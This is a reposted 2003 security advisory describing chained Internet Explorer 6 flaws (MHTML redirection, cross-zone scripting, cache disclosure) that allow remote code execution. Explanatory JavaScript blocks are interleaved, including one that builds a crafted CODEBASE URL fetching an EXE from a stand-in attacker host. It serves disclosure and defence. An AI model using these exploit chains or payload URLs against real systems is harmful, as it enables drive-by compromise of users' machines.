Hi List

Just got this in:

Cheers
Dan

--------------------------------------------------------------------
Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
--------------------------------------------------------------------

Affected platforms: IE 6.0 with XP SP1 and MS03-048.
Scope for attack: Remote via hostile web page / e-mail.
Effect: Various, up to and including remote code execution leading to compromise of the user's machine.
Resolution: Disable "Active Scripting" in the INTERNET zone.

A whole slew of vulnerabilities in Internet Explorer have been released by prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest patches applied. In other words, there are no patches available for any of these problems. This presents a "vulnerability window" in which many desktops will remain vulnerable unless remedial action is taken immediately.

Pete Philips
pete@xxxxxxxxxxxxxxxxxxx

-----------------------------------------------------------------
Integralis S3 Advise service
The following message is reposted complete from the original source.
It has not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

New "Clean" IE Remote Compromise

[tested]
OS: Win2k3, CN version
IE: with MS03-048 installed.
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
By combining several vulnerabilities in Internet Explorer, an attacker can execute his EXE file on the victim's system.
("Clean" means there is no previously published vulnerability involved in this exploit.)

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
(runs harmless demonstration executable)

[technical details]
First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile)
Then, use BackToFramedJpu to reach the MYCOMPUTER zone.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu)
At last, in the MYCOMPUTER security zone, use MhtRedirLaunchInetExe to download the payload EXE file and execute it.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe)

[Workaround]
Disable Active Scripting in the INTERNET zone.

[Greetings]
greetings to: Drew Copley, dror, guninski and mkill.
-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from others' mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support my security work, so I don't have a computer of my own. Please consider donating at: http://clik.to/donatepc

-----------------------------------------------------------------

MHTML Redirection Leads to Downloading EXE and Executing

[tested]
OS: Win2k3, CN version
IE: with MS03-048 installed.
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
A vulnerability in Internet Explorer has been found: any attacker that can reach the MYCOMPUTER security zone (a.k.a. local zone) is able to download his EXE file and execute it.
[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip

[technical details]
There is a feature in Internet Explorer when it tries to retrieve a file embedded in an MHT file, like:
    mhtml:[Mhtml_File_Url]![Original_Resource_Url]
If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE will try to download [Original_Resource_Url] and return the downloaded content. It is like an HTTP redirection.
And CODEBASE execution is a URL-based security check.
(Liu Die Yu's http://continue.to/trie)
So, in the MYCOMPUTER security zone, point the CODEBASE property of an OBJECT tag with an unused CLSID to:
    mhtml:file:///C:\No_SUCH_MHT.MHT![Attacker_PayloadEXE_Url]
and then IE will download [Attacker_PayloadEXE_Url] and execute it.

[Workaround]
Disable Active Scripting in the INTERNET zone.

[Greetings]
greetings to: Drew Copley, dror, guninski and mkill.
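The two write-ups above (the MHTML redirection bug, and the chain in the first advisory that ends with it) turn on one point: the CODEBASE check is evaluated against the URL string, while the bytes IE ends up fetching come from the URL after the "!" once the container MHT cannot be retrieved. The block below is an added example, not code from Liu Die Yu's advisory or from Internet Explorer: a small Node.js model that parses an mhtml: URL into its two parts and compares a scheme-only zone classifier with one that rates the resource actually fetched. The zone names are IE's; the parser, the policy functions and the attacker host (attacker.example) are this example's own assumptions.

```javascript
// Added example: toy model of the URL-based check described in the advisory.
// Not IE's code. Zone names follow IE; everything else here is assumed.

// Split "mhtml:<container-url>!<resource-url>" into its two parts.
// Returns null for anything that is not an mhtml: URL with a "!" separator.
function parseMhtmlUrl(url) {
  const m = /^mhtml:(.*?)!(.*)$/is.exec(url);
  if (!m) return null;
  return { container: m[1], resource: m[2] };
}

// Scheme-only classifier: decides the zone from the front of the string.
// An mhtml: URL is rated by its container, so "mhtml:file:///..." looks local.
function zoneBySchemeOnly(url) {
  const lower = url.toLowerCase();
  if (lower.startsWith('file:')) return 'MYCOMPUTER';
  if (lower.startsWith('mhtml:')) {
    const parts = parseMhtmlUrl(url);
    return parts ? zoneBySchemeOnly(parts.container) : 'INTERNET';
  }
  return 'INTERNET';
}

// Effective classifier: when the container cannot be retrieved, IE fetches the
// resource URL directly, so the resource's zone must count. Taking the least
// trusted of the two zones covers both the "container exists" and the
// "container missing" case without having to know which one applies.
function zoneByEffectiveSource(url) {
  const parts = parseMhtmlUrl(url);
  if (!parts) return zoneBySchemeOnly(url);
  const zones = [zoneBySchemeOnly(parts.container), zoneBySchemeOnly(parts.resource)];
  return zones.includes('INTERNET') ? 'INTERNET' : 'MYCOMPUTER';
}

// Model of "CODEBASE execution is a URL-based security check": a CODEBASE is
// accepted only when the policy rates it MYCOMPUTER. Both policies are shown
// side by side so the gap between them is visible for one input.
function codebaseDecision(url) {
  return {
    schemeOnly: zoneBySchemeOnly(url) === 'MYCOMPUTER',
    effective: zoneByEffectiveSource(url) === 'MYCOMPUTER',
  };
}

// Constructed input shaped like the advisory's URL; the host is made up.
const CRAFTED_CODEBASE =
  'mhtml:file:///C:\\No_SUCH_MHT.MHT!http://attacker.example/payload.exe';

console.log(parseMhtmlUrl(CRAFTED_CODEBASE));
console.log(codebaseDecision(CRAFTED_CODEBASE)); // { schemeOnly: true, effective: false }
```

The scheme-only policy accepts the crafted CODEBASE because everything it inspects says "file:"; the effective policy rejects it because the part that will be downloaded and run is an http: URL. That mismatch between the string checked and the source fetched is the whole bug, independent of the CLSID or the payload.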
-----------------------------------------------------------------

BackToFramedJpu - a successor of the BackToJpu attack

[tested]
OS: Win2k3, CN version
IE: with MS03-048 installed.
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
A cross-zone scripting vulnerability has been found in Internet Explorer. If a webpage contains a subframe (either a FRAME tag or an IFRAME tag), its security zone may be compromised.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm

[technical details]
After applying the MS03-048 patch, no javascript-protocol URL will be stored in the URL history list any more, which means the classical "javascript-protocol URL in history" attack doesn't work any more.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)
However, if an attacker does the following things:
  1. navigate a sub-frame in the victim document to a javascript-protocol URL (first navigate the sub-frame to the attacker's page, and then navigate the sub-frame to a javascript-protocol URL),
  2. then navigate the top window away,
  3. at last, navigate back ("history.back()"),
the javascript-protocol URL will be loaded by the top window (victim document) and the script in the javascript-protocol URL will be executed in the security zone of the victim document - a.k.a. cross-site/zone/domain scripting.

[Workaround]
Disable Active Scripting in the INTERNET zone.

[Greetings]
greetings to: Drew Copley, dror, guninski and mkill.

-----------------------------------------------------------------

HijackClickV2 - a successor of the HijackClick attack

[tested]
OS: Win2k3, CN version
IE: with MS03-048 installed.
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
After applying MS03-048, the original HijackClick exploit doesn't work any more. With method caching (a.k.a. "SaveRef"), HijackClick works again.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.htm

[technical details]
After applying MS03-048, the original HijackClick exploit doesn't work any more, because window.moveBy is inaccessible.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM)
The method caching attack can make window.moveBy accessible again.

[Workaround]
Disable Active Scripting in the INTERNET zone.

[Greetings]
greetings to: Drew Copley, dror, guninski and mkill.
-----------------------------------------------------------------

Invalid ContentType may disclose cache directory

[tested]
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
The problem lies in the download function of Internet Explorer. This can be exploited by malicious web pages to get the cache directory, including its random names.

[demo]
There are two harmless demos:
1st, online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
2nd, demo in ZIP format, powered by NETCAT:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip

[technical details]
When the CONTENTTYPE in the HTTP response is invalid and the file extension is "HTM", the downloaded HTM file will be opened from the cache directory, in the INTERNET security zone.
In the 1st demo, this is done by the following ASP code:
----------
response.ContentType = "whocares"
response.AddHeader "content-disposition", "inline; filename=test.htm"
----------
In the 2nd demo, this is done with the help of NETCAT.

[Workaround]
Disable Active Scripting in the INTERNET zone, so the HTML page opened in the cache can't send information back to the attacker.

Note for "Invalid ContentType may disclose cache directory"
This vulnerability ("Invalid ContentType may disclose cache directory") doesn't work on all systems.
("Invalid ContentType may disclose cache directory", at http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
Please note that execdror6 and LocalZoneInCache also depend on this vulnerability.
(execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
LocalZoneInCache: http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)

I have spent an extraordinary amount of time on this issue and here is all I know about it:
First, the code was verified to work on a WinXp system (Simplified Chinese version) with all patches.
Then, I sent LocalZoneInCache to HTTP-EQUIV, Dror Shalev and the Pull for testing: it works on Dror Shalev's WinXp machine (up-to-date) but it doesn't work on the Pull's Win2k system (because he set the killbit for the Adodb.Stream ActiveX object).
Soon after that, HTTP-EQUIV found it does not work on his WinXp system (2-3 weeks old, with the latest IE patch).
Then, to figure out what happened, I formatted the disk and installed Win2k3 and WinXp (both Simplified Chinese version) and then applied the latest IE patch. Both remote compromise cases (LocalZoneInCache and execdror6) don't work any more.
At last, I reproduced both remote compromise cases on MSIE v6 running on Simplified Chinese WinXp with the following patches: SP1; Q828750; Q330994; Q824145 (a.k.a. MS03-048)
If you are using IE, please help me test it and send the result directly to my emailbox. Thanks in advance.

[Greetings]
greetings to: Drew Copley, dror, guninski and mkill.

-----------------------------------------------------------------

Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise

[tested]
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
By combining cache file disclosure and several other unpatched vulnerabilities, a malicious INTERNET page can reach the MYCOMPUTER zone. The demo uses Adodb.Stream to launch a remote compromise attack.

[demo]
There are two harmless demos:
Online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html
(runs harmless demonstration executable)

[technical details]
First, place an HTML file in the IE cache directory and get its location.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
Second, this HTML file can be parsed as an HTML page and treated as in the MYCOMPUTER security zone.
(Mindwarper of mlsecurity.com's http://www.mlsecurity.com/ie/ie.htm)
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Content.htm)
At last, overwrite NOTEPAD.EXE and make IE launch it by opening a view-source protocol URL.
(HTTP-EQUIV of MALWARE's http://www.securityfocus.com/archive/1/343521)

[Workaround]
Disable Active Scripting in the INTERNET zone, so the HTML page opened in the cache can't send information back to the attacker.

[Greetings]
greetings to: Drew Copley, dror, guninski, vadim and mkill.

-----------------------------------------------------------------

IE Remote Compromise by Getting Cache Location

[tested]
OS: WinXp, CN version
Microsoft Internet Explorer v6 SP1; up-to-date on 2003/11/16

[overview]
With the help of LocalZoneInCache (refer to the "[technical details]" part), an attacker can compromise a user's system even though the user has:
1. Customized the IE cache directory,
2. Applied the MS03-048 patch,
3. Set the killbit for the ADODB.STREAM ActiveX.

[demo]
Online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html
(runs harmless demonstration executable)

[technical details]
execdror6 is derived from execdror5.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
execdror6 differs from execdror5 in that:
1st, execdror6 uses LocalZoneInCache to reach the MYCOMPUTER security zone.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
2nd, execdror6 gets the IE cache directory directly from location.href.
(LocalZoneInCache makes the attacker's HTML page open in the cache directory.)

[Workaround]
Disable Active Scripting in the INTERNET zone, so the HTML page opened in the cache can't send information back to the attacker.

[Greetings]
greetings to: Drew Copley, dror, guninski, vadim and mkill.
------------------------------------------------------------------------

The information contained herein is to keep you aware of developments in IT security that have general relevance to your IT systems environment. Our objective is to provide information to you as rapidly as possible to alert you to security threats, issues and potential solutions. In view of the expediency of the information, the solutions described will not necessarily have been fully tested as to their applicability to your particular environment. Hence you use this information at your sole risk and liability. All trademarks are acknowledged as belonging to their respective owners.
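The HijackClickV2 advisory above works because a JavaScript function object, once captured in a variable, is independent of the property it was read from: blocking later reads of window.moveBy does not revoke a reference saved earlier. The block below is an added example and not the advisory's demo code; it models that "SaveRef" pattern in plain Node.js with a stand-in `win` object (IE's window object and the MS03-048 change are modelled, not reproduced) and sets a hardened variant beside it, in which the permission check lives inside the method where a stale reference cannot bypass it.

```javascript
// Added example: "method caching" (SaveRef) against a property-level block,
// beside a call-time check that defeats it. The `win` objects are stand-ins,
// not browser objects; the lockDown() functions model a patch, not IE's code.

// Window whose moveBy is guarded at the property: reads are blocked later.
function makeWindowGuardedAtProperty() {
  const pos = { x: 0, y: 0 };
  const win = {
    moveBy(dx, dy) { pos.x += dx; pos.y += dy; return [pos.x, pos.y]; },
  };
  // Models "window.moveBy is inaccessible": reading the property now throws.
  const lockDown = () => Object.defineProperty(win, 'moveBy', {
    get() { throw new Error('Permission denied'); },
  });
  return { win, lockDown };
}

// Window whose moveBy checks permission every time it is called.
function makeWindowGuardedAtCall() {
  const pos = { x: 0, y: 0 };
  let scriptAllowed = true;
  const win = {
    moveBy(dx, dy) {
      if (!scriptAllowed) throw new Error('Permission denied');
      pos.x += dx; pos.y += dy; return [pos.x, pos.y];
    },
  };
  return { win, lockDown: () => { scriptAllowed = false; } };
}

// The attack pattern: read the method while it is still reachable, wait for
// the lockdown, then call the saved reference instead of the property.
function saveRefAttack(factory) {
  const { win, lockDown } = factory();
  const saved = win.moveBy;   // "SaveRef": the function object itself
  lockDown();
  let direct;
  try { win.moveBy(1, 1); direct = 'allowed'; } catch (e) { direct = 'denied'; }
  let viaSavedRef;
  try { viaSavedRef = saved.call(win, 10, 5); } catch (e) { viaSavedRef = 'denied'; }
  return { direct, viaSavedRef };
}

console.log(saveRefAttack(makeWindowGuardedAtProperty)); // { direct: 'denied', viaSavedRef: [ 10, 5 ] }
console.log(saveRefAttack(makeWindowGuardedAtCall));     // { direct: 'denied', viaSavedRef: 'denied' }
```

Against the property-guarded window the direct call is refused but the cached reference still moves it, which is the V2 bypass in miniature; against the call-guarded window both paths are refused. The general lesson is that a check performed at property lookup only protects callers who look the property up after the check is in place.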
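The "Invalid ContentType may disclose cache directory" write-up above boils down to a header pattern: a Content-Type that is not a valid media type paired with a Content-Disposition that names an .htm file. As an added example (not part of the advisory or its demos), the Node.js block below parses a raw response header block and flags that combination, the kind of rule a filtering proxy or IDS could apply; the two sample responses are constructed for this example, the first mirroring the headers the advisory's ASP snippet emits.

```javascript
// Added example: flag HTTP responses that pair an invalid Content-Type with a
// Content-Disposition naming an .htm/.html file. Samples are constructed.

// Media type per RFC 2045 / RFC 7231: token "/" token, optional ";" parameters.
const TOKEN = "[!#$%&'*+.^_`|~0-9A-Za-z-]+";
const MEDIA_TYPE = new RegExp(`^${TOKEN}/${TOKEN}(\\s*;.*)?$`);

// Parse a raw header block (status line optional) into a lower-cased map.
// Duplicate header names keep the last value, which is enough for this check.
function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i < 1) continue;                       // status line or blank line
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Extract the filename parameter from a Content-Disposition value, if any.
function dispositionFilename(value) {
  const m = /filename\s*=\s*"?([^";]+)"?/i.exec(value || '');
  return m ? m[1].trim() : null;
}

// The detection rule: both conditions from the advisory must hold.
function isInvalidTypeHtmDownload(rawHeaders) {
  const h = parseHeaders(rawHeaders);
  const ct = h['content-type'];
  const name = dispositionFilename(h['content-disposition']);
  const invalidType = ct !== undefined && !MEDIA_TYPE.test(ct);
  const htmName = name !== null && /\.html?$/i.test(name);
  return invalidType && htmName;
}

// Constructed samples. The first carries the headers the advisory's ASP code emits.
const SAMPLE_SUSPECT = [
  'HTTP/1.1 200 OK',
  'Content-Type: whocares',
  'Content-Disposition: inline; filename=test.htm',
].join('\r\n');

const SAMPLE_BENIGN = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'Content-Disposition: inline; filename=test.htm',
].join('\r\n');

console.log(isInvalidTypeHtmDownload(SAMPLE_SUSPECT)); // true
console.log(isInvalidTypeHtmDownload(SAMPLE_BENIGN));  // false
```

The rule is deliberately narrow: a well-formed text/html response with the same inline filename is not flagged, and neither is a malformed Content-Type on a non-HTML filename, so it targets the specific combination the advisory describes rather than every sloppy server.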